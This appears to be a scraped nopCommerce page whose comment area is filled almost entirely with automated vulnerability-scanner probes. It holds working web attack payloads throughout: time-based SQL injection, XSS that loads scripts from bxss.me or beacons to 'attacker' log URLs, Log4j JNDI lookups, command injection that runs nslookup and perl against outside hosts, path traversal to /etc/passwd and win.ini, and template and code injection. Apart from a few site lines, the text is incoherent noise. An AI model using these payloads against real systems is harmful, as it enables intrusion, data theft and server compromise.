For full feature list go to nopCommerce.com
Providing outstanding custom search engine optimization, web development services and e-commerce development solutions to our clients at a fair price in a professional manner.
This is a sample comment...
555
1HmkNHcEO
response.write(9546467*9544260)
/../../../../../../../../../../windows/system32/BITSADMIN.exe
${j${::-n}di:dns${::-:}${::-/}/hitjogrkezlwbb9a1e${::-.}bxss.me}zzzz
echo lpwshk$()\ wrvhen\nz^xyu||a #' &echo lpwshk$()\ wrvhen\nz^xyu||a #|" &echo lpwshk$()\ wrvhen\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=1141-917&h=1141-0d77d-2&"></script>
pl4rzJGS
'+response.write(9546467*9544260)+'
555bcc:074625.1141-929.1141.0d77d.19250.2@bxss.me
../../../../../../../../../../../../../../windows/win.ini
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitjumrygobtfa5bd3${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
&echo qlyrno$()\ hlojmn\nz^xyu||a #' &echo qlyrno$()\ hlojmn\nz^xyu||a #|" &echo qlyrno$()\ hlojmn\nz^xyu||a #
to@example.com>bcc:074625.1141-937.1141.0d77d.19250.2@bxss.me
"+response.write(9546467*9544260)+"
555<esi:include src="http://bxss.me/rpb.png"/>
file:///etc/passwd
${9999303+9999928}
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.1141-942.1141.0d77d${::-.}1${::-.}bxss.me}}
|echo usywan$()\ kgrniv\nz^xyu||a #' |echo usywan$()\ kgrniv\nz^xyu||a #|" |echo usywan$()\ kgrniv\nz^xyu||a #
-1 OR 2+535-535-1=0+0+0+1 --
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555&n986111=v975440
../555
)
(nslookup hitudbdorftko05c41.bxss.me||perl -e "gethostbyname('hitudbdorftko05c41.bxss.me')")
-1 OR 2+275-275-1=0+0+0+1
'.gethostbyname(lc('hityo'.'vryehjso3141c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(75).chr(103).chr(80).'
-1' OR 2+624-624-1=0+0+0+1 --
!(()&&!|*|*|
Http://bxss.me/t/fit.txt
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
$(nslookup hitxpeztjmnkrc7fb1.bxss.me||perl -e "gethostbyname('hitxpeztjmnkrc7fb1.bxss.me')")
".gethostbyname(lc("hitkb"."qgmwicqfba641.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(89).chr(111).chr(85)."
'"()
-1' OR 2+207-207-1=0+0+0+1 or 'TN3S7X4C'='
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hiteklquuttjcddb1f.'+'bxss.me')
^(#$!@#$)(()))******
http://bxss.me/t/fit.txt?.jpg
';print(md5(31337));$a='
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hiteklquuttjcddb1f."+"bxss.me")+'
&(nslookup hitigsctcncfeeea18.bxss.me||perl -e "gethostbyname('hitigsctcncfeeea18.bxss.me')")&'\"`0&(nslookup hitigsctcncfeeea18.bxss.me||perl -e "gethostbyname('hitigsctcncfeeea18.bxss.me')")&`'
/etc/shells
";print(md5(31337));$a="
-1" OR 2+971-971-1=0+0+0+1 --
HttP://bxss.me/t/xss.html?%00
c:/windows/win.ini
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hiteklquuttjcddb1f.'+'bxss.me')+"
if(now()=sysdate(),sleep(15),0)
${@print(md5(31337))}
bxss.me/t/xss.html?%00
|(nslookup hithrfrafxcajbc1e1.bxss.me||perl -e "gethostbyname('hithrfrafxcajbc1e1.bxss.me')")
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
${@print(md5(31337))}\
bxss.me
`(nslookup hitovtakcqzux27bf8.bxss.me||perl -e "gethostbyname('hitovtakcqzux27bf8.bxss.me')")`
"+"A".concat(70-3).concat(22*4).concat(107).concat(88).concat(103).concat(79)+(require"socket"Socket.gethostbyname("hitwm"+"chxqzxta1a9ee.bxss.me.")[3].to_s)+"
555'&&sleep(27*1000)*lztsov&&'
about-nopcommerce
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
'.print(md5(31337)).'
555"&&sleep(27*1000)*thbkcb&&"
;(nslookup hitdyzybwscmed2b4f.bxss.me||perl -e "gethostbyname('hitdyzybwscmed2b4f.bxss.me')")|(nslookup hitdyzybwscmed2b4f.bxss.me||perl -e "gethostbyname('hitdyzybwscmed2b4f.bxss.me')")&(nslookup hitdyzybwscmed2b4f.bxss.me||perl -e "gethostbyname('hitdyzybwscmed2b4f.bxss.me')")
'+'A'.concat(70-3).concat(22*4).concat(111).concat(90).concat(103).concat(75)+(require'socket'Socket.gethostbyname('hitdz'+'usavleph05cd0.bxss.me.')[3].to_s)+'
http://hitdnahblzzxc.bxss.me/
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555'||sleep(27*1000)*oucyhs||'
about-nopcommerce/.
-1; waitfor delay '0:0:15' --
555"||sleep(27*1000)*kyyvmm||"
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
/xfs.bxss.me
1 waitfor delay '0:0:15' --
'"
bWBSCaHc'; waitfor delay '0:0:15' --
<!--
jyOeFEAT'); waitfor delay '0:0:15' --
555'"()&%<zzz><ScRiPt >5mEB(9566)</ScRiPt>
6QjWwjKI')); waitfor delay '0:0:15' --
-5 OR 912=(SELECT 912 FROM PG_SLEEP(15))--
'"()&%<zzz><ScRiPt >5mEB(9907)</ScRiPt>
-5) OR 473=(SELECT 473 FROM PG_SLEEP(15))--
-1)) OR 494=(SELECT 494 FROM PG_SLEEP(15))--
5559008272
1XqJd7A6' OR 252=(SELECT 252 FROM PG_SLEEP(15))--
63tjZJlq') OR 879=(SELECT 879 FROM PG_SLEEP(15))--
cJcR46L7')) OR 255=(SELECT 255 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
bfg8200<s1﹥s2ʺs3ʹhjl8200
1'"
bfgx4997%C0%BEz1%C0%BCz2a%90bcxhjl4997
@@5awOq
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
555'"()&%<zzz><ScRiPt >yBnv(9793)</ScRiPt>
555'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=1141-1252&h=1141-0d77d-2&"></script>
response.write(9851917*9152367)
echo qwsoye$()\ ndpuoe\nz^xyu||a #' &echo qwsoye$()\ ndpuoe\nz^xyu||a #|" &echo qwsoye$()\ ndpuoe\nz^xyu||a #
${j${::-n}di:dns${::-:}${::-/}/hitqwiqoscycl192d3${::-.}bxss.me}zzzz
sqq3P3vx
'+response.write(9851917*9152367)+'
555bcc:074625.1141-1257.1141.0d77d.19250.2@bxss.me
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitheqadtzxhg5f31b${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
&echo hwpxmb$()\ rqywaj\nz^xyu||a #' &echo hwpxmb$()\ rqywaj\nz^xyu||a #|" &echo hwpxmb$()\ rqywaj\nz^xyu||a #
dfb{{98991*97996}}xca
"+response.write(9851917*9152367)+"
to@example.com>bcc:074625.1141-1262.1141.0d77d.19250.2@bxss.me
|echo gmizvc$()\ fxggis\nz^xyu||a #' |echo gmizvc$()\ fxggis\nz^xyu||a #|" |echo gmizvc$()\ fxggis\nz^xyu||a #
${10000057+10000182}
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.1141-1263.1141.0d77d${::-.}1${::-.}bxss.me}}
'"()&%<zzz><ScRiPt >yBnv(9132)</ScRiPt>
-1 OR 2+375-375-1=0+0+0+1 --
(nslookup hitkymyvxxlzd7a361.bxss.me||perl -e "gethostbyname('hitkymyvxxlzd7a361.bxss.me')")
-1 OR 2+93-93-1=0+0+0+1
555&n968694=v967581
$(nslookup hitcvfhlxcjgc37e34.bxss.me||perl -e "gethostbyname('hitcvfhlxcjgc37e34.bxss.me')")
-1' OR 2+454-454-1=0+0+0+1 --
dfb[[${98991*97996}]]xca
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitauhuivijeda608f.'+'bxss.me')
'.gethostbyname(lc('hitsp'.'evnegvcl81af6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(66).chr(122).chr(74).'
-1' OR 2+49-49-1=0+0+0+1 or '8nPGKzHo'='
5559570984
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitauhuivijeda608f."+"bxss.me")+'
&(nslookup hitgfanbtkigg6c258.bxss.me||perl -e "gethostbyname('hitgfanbtkigg6c258.bxss.me')")&'\"`0&(nslookup hitgfanbtkigg6c258.bxss.me||perl -e "gethostbyname('hitgfanbtkigg6c258.bxss.me')")&`'
".gethostbyname(lc("hitho"."bhcxozdd71feb.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(89).chr(110).chr(68)."
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitauhuivijeda608f.'+'bxss.me')+"
-1" OR 2+732-732-1=0+0+0+1 --
|(nslookup hitpiennimshn50069.bxss.me||perl -e "gethostbyname('hitpiennimshn50069.bxss.me')")
dfb__${98991*97996}__::.x
"+"A".concat(70-3).concat(22*4).concat(120).concat(72).concat(120).concat(77)+(require"socket"Socket.gethostbyname("hittq"+"qgbsrwvr185f6.bxss.me.")[3].to_s)+"
`(nslookup hitqoucsjmckj35cba.bxss.me||perl -e "gethostbyname('hitqoucsjmckj35cba.bxss.me')")`
'+'A'.concat(70-3).concat(22*4).concat(100).concat(68).concat(107).concat(81)+(require'socket'Socket.gethostbyname('hitpq'+'gcumhxpx3be63.bxss.me.')[3].to_s)+'
http://hitvjyxskwuzl.bxss.me/
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
;(nslookup hitcvrdyjhrpq38992.bxss.me||perl -e "gethostbyname('hitcvrdyjhrpq38992.bxss.me')")|(nslookup hitcvrdyjhrpq38992.bxss.me||perl -e "gethostbyname('hitcvrdyjhrpq38992.bxss.me')")&(nslookup hitcvrdyjhrpq38992.bxss.me||perl -e "gethostbyname('hitcvrdyjhrpq38992.bxss.me')")
555'&&sleep(27*1000)*vviriv&&'
555<ScRiPt >5mEB(9559)</ScRiPt>
555'"()&%<zzz><ScRiPt >QVPX(9341)</ScRiPt>
555"&&sleep(27*1000)*mkouxc&&"
555'||sleep(27*1000)*kcaqiw||'
555"||sleep(27*1000)*rifkbv||"
'"()&%<zzz><ScRiPt >QVPX(9920)</ScRiPt>
555<WLPART>9WZNK[!+!]</WLPART>
555<script>5mEB(9825)</script>
5559791453
555<ScR<ScRiPt>IpT>5mEB(9851)</sCr<ScRiPt>IpT>
bfg5877<s1﹥s2ʺs3ʹhjl5877
555<ScRiPt >5mEB(9640)</ScRiPt>
dFWbmSik'; waitfor delay '0:0:15' --
bfgx9077%C0%BEz1%C0%BCz2a%90bcxhjl9077
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9206></ScRiPt>
7uy5NjsY'); waitfor delay '0:0:15' --
555<isindex type=image src=1 onerror=5mEB(9748)>
ml9uOeX1')); waitfor delay '0:0:15' --
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9750'>
555<body onload=5mEB(9946)>
-5 OR 419=(SELECT 419 FROM PG_SLEEP(15))--
555<img src=//xss.bxss.me/t/dot.gif onload=5mEB(9165)>
-5) OR 427=(SELECT 427 FROM PG_SLEEP(15))--
555<img src=xyz OnErRor=5mEB(9731)>
-1)) OR 154=(SELECT 154 FROM PG_SLEEP(15))--
555<img/src=">" onerror=alert(9848)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%35%6D%45%42%289222%29%3C%2F%73%43%72%69%70%54%3E
sJYiEGPW' OR 877=(SELECT 877 FROM PG_SLEEP(15))--
555\u003CScRiPt\5mEB(9968)\u003C/sCripT\u003E
VHs0du4s') OR 22=(SELECT 22 FROM PG_SLEEP(15))--
555<ScRiPt>5mEB(9578)</sCripT>
s4aIDNCf')) OR 527=(SELECT 527 FROM PG_SLEEP(15))--
%F6<img zzz onmouseover=5mEB(99831) //%F6>
555<ScRiPt >QVPX(9121)</ScRiPt>
555<input autofocus onfocus=5mEB(9908)>
555<WVSPMX>GMEMV[!+!]</WVSPMX>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555<script>QVPX(9472)</script>
@@yQwRB
555}body{zzz:Expre/**/SSion(5mEB(9219))}
555<ScR<ScRiPt>IpT>QVPX(9492)</sCr<ScRiPt>IpT>
555wSgzP<ScRiPt >5mEB(9511)</ScRiPt>
555<ScRiPt >QVPX(9747)</ScRiPt>
555<WJKZAF>ZGU8A[!+!]</WJKZAF>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9589></ScRiPt>
555<ifRAme sRc=9749.com></IfRamE>
555<azQjWcN x=9046>
555<isindex type=image src=1 onerror=QVPX(9279)>
555<img sRc='http://attacker-9479/log.php?
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9993'>
555<aDxKfOm<
555<body onload=QVPX(9286)>
555<img src=//xss.bxss.me/t/dot.gif onload=QVPX(9096)>
555<img src=xyz OnErRor=QVPX(9728)>
555<img/src=">" onerror=alert(9429)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%51%56%50%58%289730%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\QVPX(9781)\u003C/sCripT\u003E
555<ScRiPt>QVPX(9220)</sCripT>
%F6<img zzz onmouseover=QVPX(91181) //%F6>
555<input autofocus onfocus=QVPX(9233)>
555}body{zzz:Expre/**/SSion(QVPX(9716))}
555e8dY9<ScRiPt >QVPX(9981)</ScRiPt>
555<WROSSQ>KJFGA[!+!]</WROSSQ>
555<ifRAme sRc=9804.com></IfRamE>
555<aT5EMzH x=9936>
555<img sRc='http://attacker-9926/log.php?
555<aZgaA7A<
555'"()&%<zzz><ScRiPt >2kdV(9293)</ScRiPt>
'"()&%<zzz><ScRiPt >2kdV(9285)</ScRiPt>
5559063439
bfg2643<s1﹥s2ʺs3ʹhjl2643
bfgx7449%C0%BEz1%C0%BCz2a%90bcxhjl7449
555<ScRiPt >2kdV(9050)</ScRiPt>
555<WEI2ZO>IL8KM[!+!]</WEI2ZO>
555<script>2kdV(9946)</script>
555<ScR<ScRiPt>IpT>2kdV(9106)</sCr<ScRiPt>IpT>
555<ScRiPt >2kdV(9168)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9884></ScRiPt>
555<isindex type=image src=1 onerror=2kdV(9893)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9804'>
555<body onload=2kdV(9374)>
555<img src=//xss.bxss.me/t/dot.gif onload=2kdV(9465)>
555<img src=xyz OnErRor=2kdV(9964)>
555<img/src=">" onerror=alert(9278)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%32%6B%64%56%289031%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\2kdV(9943)\u003C/sCripT\u003E
555<ScRiPt>2kdV(9716)</sCripT>
%F6<img zzz onmouseover=2kdV(92481) //%F6>
555<input autofocus onfocus=2kdV(9153)>
555}body{zzz:Expre/**/SSion(2kdV(9368))}
555XpZ0t<ScRiPt >2kdV(9506)</ScRiPt>
555<W02BHJ>8PQQM[!+!]</W02BHJ>
555<ifRAme sRc=9513.com></IfRamE>
555<aEogC2H x=9265>
555<img sRc='http://attacker-9578/log.php?
555<av8a43V<
555'"()&%<zzz><ScRiPt >kOMN(9315)</ScRiPt>
'"()&%<zzz><ScRiPt >kOMN(9368)</ScRiPt>
5559458226
bfg6462<s1﹥s2ʺs3ʹhjl6462
bfgx10540%C0%BEz1%C0%BCz2a%90bcxhjl10540
555<ScRiPt >kOMN(9880)</ScRiPt>
555<WX2BAF>D9CUL[!+!]</WX2BAF>
555<script>kOMN(9958)</script>
555<ScR<ScRiPt>IpT>kOMN(9991)</sCr<ScRiPt>IpT>
555<ScRiPt >kOMN(9226)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9909></ScRiPt>
555<isindex type=image src=1 onerror=kOMN(9043)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9168'>
555<body onload=kOMN(9450)>
555<img src=//xss.bxss.me/t/dot.gif onload=kOMN(9489)>
555<img src=xyz OnErRor=kOMN(9568)>
555<img/src=">" onerror=alert(9605)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%6B%4F%4D%4E%289927%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\kOMN(9214)\u003C/sCripT\u003E
555<ScRiPt>kOMN(9834)</sCripT>
%F6<img zzz onmouseover=kOMN(99431) //%F6>
555<input autofocus onfocus=kOMN(9637)>
555}body{zzz:Expre/**/SSion(kOMN(9304))}
555tZXz3<ScRiPt >kOMN(9178)</ScRiPt>
555<WJYDP4>JO5AD[!+!]</WJYDP4>
555<ifRAme sRc=9933.com></IfRamE>
555<ajb5Lxs x=9567>
555<img sRc='http://attacker-9925/log.php?
555<aQH3s0q<
555'"()&%<zzz><ScRiPt >86Sf(9815)</ScRiPt>
'"()&%<zzz><ScRiPt >86Sf(9082)</ScRiPt>
5559649774
bfg9431<s1﹥s2ʺs3ʹhjl9431
bfgx1988%C0%BEz1%C0%BCz2a%90bcxhjl1988
${j${::-n}di:dns${::-:}${::-/}/hitbahxzlargnb11db${::-.}bxss.me}zzzz
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitowqbettchnc33fb${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.1141-63843.1141.0d77d${::-.}1${::-.}bxss.me}}
-1 OR 2+927-927-1=0+0+0+1 --
-1 OR 3+927-927-1=0+0+0+1 --
-1 OR 2+896-896-1=0+0+0+1
-1 OR 3+896-896-1=0+0+0+1
-1' OR 2+671-671-1=0+0+0+1 --
-1' OR 3+671-671-1=0+0+0+1 --
-1' OR 2+562-562-1=0+0+0+1 or '3RYqnYUx'='
-1' OR 3+562-562-1=0+0+0+1 or '3RYqnYUx'='
-1" OR 2+789-789-1=0+0+0+1 --
-1" OR 3+789-789-1=0+0+0+1 --
response.write(9678615*9755441)
'+response.write(9678615*9755441)+'
"+response.write(9678615*9755441)+"
555<ScRiPt >86Sf(9741)</ScRiPt>
'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=1141-63847&h=1141-0d77d-2&"></script>
555<WYAYJP>KCNGK[!+!]</WYAYJP>
echo ryhaqm$()\ zulldi\nz^xyu||a #' &echo ryhaqm$()\ zulldi\nz^xyu||a #|" &echo ryhaqm$()\ zulldi\nz^xyu||a #
FSQ4Iqn5
&echo inniab$()\ vnkcid\nz^xyu||a #' &echo inniab$()\ vnkcid\nz^xyu||a #|" &echo inniab$()\ vnkcid\nz^xyu||a #
|echo sqtzrr$()\ ombmny\nz^xyu||a #' |echo sqtzrr$()\ ombmny\nz^xyu||a #|" |echo sqtzrr$()\ ombmny\nz^xyu||a #
555<script>86Sf(9737)</script>
(nslookup hitarxilfkcxmd2200.bxss.me||perl -e "gethostbyname('hitarxilfkcxmd2200.bxss.me')")
$(nslookup hitxvkfwdntur8888a.bxss.me||perl -e "gethostbyname('hitxvkfwdntur8888a.bxss.me')")
&(nslookup hitstdtnunvoya71cc.bxss.me||perl -e "gethostbyname('hitstdtnunvoya71cc.bxss.me')")&'\"`0&(nslookup hitstdtnunvoya71cc.bxss.me||perl -e "gethostbyname('hitstdtnunvoya71cc.bxss.me')")&`'
bcc:074625.1141-63852.1141.0d77d.19250.2@bxss.me
555<ScR<ScRiPt>IpT>86Sf(9950)</sCr<ScRiPt>IpT>
to@example.com>bcc:074625.1141-63853.1141.0d77d.19250.2@bxss.me
|(nslookup hitdjkouhdzuo624b7.bxss.me||perl -e "gethostbyname('hitdjkouhdzuo624b7.bxss.me')")
`(nslookup hitjtqpwtzbcz5df28.bxss.me||perl -e "gethostbyname('hitjtqpwtzbcz5df28.bxss.me')")`
;(nslookup hitmvxfglqwlm4d14e.bxss.me||perl -e "gethostbyname('hitmvxfglqwlm4d14e.bxss.me')")|(nslookup hitmvxfglqwlm4d14e.bxss.me||perl -e "gethostbyname('hitmvxfglqwlm4d14e.bxss.me')")&(nslookup hitmvxfglqwlm4d14e.bxss.me||perl -e "gethostbyname('hitmvxfglqwlm4d14e.bxss.me')")
../
./
555<ScRiPt >86Sf(9642)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9013></ScRiPt>
<esi:include src="http://bxss.me/rpb.png"/>
${9999915+9999739}
555<isindex type=image src=1 onerror=86Sf(9709)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9271'>
555<body onload=86Sf(9971)>
555<img src=//xss.bxss.me/t/dot.gif onload=86Sf(9686)>
555<img src=xyz OnErRor=86Sf(9296)>
&n998410=v971551
555<img/src=">" onerror=alert(9850)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%38%36%53%66%289185%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\86Sf(9526)\u003C/sCripT\u003E
555<ScRiPt>86Sf(9026)</sCripT>
%F6<img zzz onmouseover=86Sf(94661) //%F6>
'.gethostbyname(lc('hitic'.'kmlijoalc7d11.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(86).chr(103).chr(72).'
".gethostbyname(lc("hitjq"."pyvuuwzx71ff2.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(74).chr(109).chr(79)."
555<input autofocus onfocus=86Sf(9680)>
'&&sleep(27*1000)*anccof&&'
"&&sleep(27*1000)*pmwnka&&"
'||sleep(27*1000)*fogbjn||'
"||sleep(27*1000)*ffrjjq||"
555}body{zzz:Expre/**/SSion(86Sf(9042))}
ctimesleepp0(I30tp1Rp2.
str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitckgarjiadff901d.'+'bxss.me')
'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitckgarjiadff901d."+"bxss.me")+'
5552oYAY<ScRiPt >86Sf(9984)</ScRiPt>
"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitckgarjiadff901d.'+'bxss.me')+"
555<W3YD8H>6YUAR[!+!]</W3YD8H>
555<ifRAme sRc=9754.com></IfRamE>
555<ahURrji x=9529>
555<img sRc='http://attacker-9737/log.php?
"+"A".concat(70-3).concat(22*4).concat(112).concat(66).concat(99).concat(65)+(require"socket"Socket.gethostbyname("hitaj"+"errwccyc45995.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(112).concat(76).concat(97).concat(77)+(require'socket'Socket.gethostbyname('hitcw'+'atwkpiaqa568d.bxss.me.')[3].to_s)+'
555<acj4SXr<
http://hiteyssuwnqsj.bxss.me/
'"()&%<zzz><ScRiPt >aaEU(9717)</ScRiPt>
'"()&%<zzz><ScRiPt >aaEU(9824)</ScRiPt>
9454734
bfg7793<s1﹥s2ʺs3ʹhjl7793
bfgx3307%C0%BEz1%C0%BCz2a%90bcxhjl3307
<ScRiPt >aaEU(9150)</ScRiPt>
<WVSEYZ>ZBH0A[!+!]</WVSEYZ>
<script>aaEU(9634)</script>
<ScR<ScRiPt>IpT>aaEU(9373)</sCr<ScRiPt>IpT>
<ScRiPt >aaEU(9291)</ScRiPt>
<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9299></ScRiPt>
<isindex type=image src=1 onerror=aaEU(9531)>
<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9919'>
<body onload=aaEU(9375)>
hBJUq8Dv'; waitfor delay '0:0:15' --
<img src=//xss.bxss.me/t/dot.gif onload=aaEU(9848)>
<img src=xyz OnErRor=aaEU(9872)>
<img/src=">" onerror=alert(9059)>
%0D%0A%3C%53%63%52%69%50%74%20%3E%61%61%45%55%289032%29%3C%2F%73%43%72%69%70%54%3E
\u003CScRiPt\aaEU(9174)\u003C/sCripT\u003E
<ScRiPt>aaEU(9518)</sCripT>
%F6<img zzz onmouseover=aaEU(92201) //%F6>
<input autofocus onfocus=aaEU(9805)>
xoWYcZvL'); waitfor delay '0:0:15' --
}body{zzz:Expre/**/SSion(aaEU(9762))}
PaBgV<ScRiPt >aaEU(9708)</ScRiPt>
<WUQKAK>BJ77E[!+!]</WUQKAK>
<ifRAme sRc=9087.com></IfRamE>
<alvHM0S x=9922>
<img sRc='http://attacker-9811/log.php?
HaMOqOLi')); waitfor delay '0:0:15' --
<a6vw3fU<
-5 OR 803=(SELECT 803 FROM PG_SLEEP(15))--
-5) OR 387=(SELECT 387 FROM PG_SLEEP(15))--
-1)) OR 729=(SELECT 729 FROM PG_SLEEP(15))--
4J0rGNPg' OR 475=(SELECT 475 FROM PG_SLEEP(15))--
KznKpYL6') OR 379=(SELECT 379 FROM PG_SLEEP(15))--
7RC4x9ty')) OR 730=(SELECT 730 FROM PG_SLEEP(15))--
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
@@yD8Qi


555'"()&%<zzz><ScRiPt >omNg(9204)</ScRiPt>
${j${::-n}di:dns${::-:}${::-/}/hitpnswbgpogv230af${::-.}bxss.me}zzzz
response.write(9926493*9253920)

'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=1141-67638&h=1141-0d77d-2&"></script>
'+response.write(9926493*9253920)+'
"+response.write(9926493*9253920)+"
%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitnmtljyyjdyc5a95${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
echo trispn$()\ lopvpz\nz^xyu||a #' &echo trispn$()\ lopvpz\nz^xyu||a #|" &echo trispn$()\ lopvpz\nz^xyu||a #
'"()&%<zzz><ScRiPt >omNg(9798)</ScRiPt>
&echo ehrlvs$()\ vkmevb\nz^xyu||a #' &echo ehrlvs$()\ vkmevb\nz^xyu||a #|" &echo ehrlvs$()\ vkmevb\nz^xyu||a #
xxOkCbGI
${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.1141-67642.1141.0d77d${::-.}1${::-.}bxss.me}}
|echo xqqpxr$()\ rqiemb\nz^xyu||a #' |echo xqqpxr$()\ rqiemb\nz^xyu||a #|" |echo xqqpxr$()\ rqiemb\nz^xyu||a #
(nslookup hitovcxabwywj15919.bxss.me||perl -e "gethostbyname('hitovcxabwywj15919.bxss.me')")
5559616061
$(nslookup hitnynlkqjbct9f9a6.bxss.me||perl -e "gethostbyname('hitnynlkqjbct9f9a6.bxss.me')")
&(nslookup hitdgtrvzgadma7ef7.bxss.me||perl -e "gethostbyname('hitdgtrvzgadma7ef7.bxss.me')")&'\"`0&(nslookup hitdgtrvzgadma7ef7.bxss.me||perl -e "gethostbyname('hitdgtrvzgadma7ef7.bxss.me')")&`'

<esi:include src="http://bxss.me/rpb.png"/>
../

|(nslookup hitwpcglyakut23483.bxss.me||perl -e "gethostbyname('hitwpcglyakut23483.bxss.me')")
${10000351+10000012}
to@example.com>bcc:074625.1141-67647.1141.0d77d.19250.2@bxss.me

&n968116=v933531
`(nslookup hitpfytzeywyz44882.bxss.me||perl -e "gethostbyname('hitpfytzeywyz44882.bxss.me')")`
;(nslookup hitxxgudqbsxge1306.bxss.me||perl -e "gethostbyname('hitxxgudqbsxge1306.bxss.me')")|(nslookup hitxxgudqbsxge1306.bxss.me||perl -e "gethostbyname('hitxxgudqbsxge1306.bxss.me')")&(nslookup hitxxgudqbsxge1306.bxss.me||perl -e "gethostbyname('hitxxgudqbsxge1306.bxss.me')")
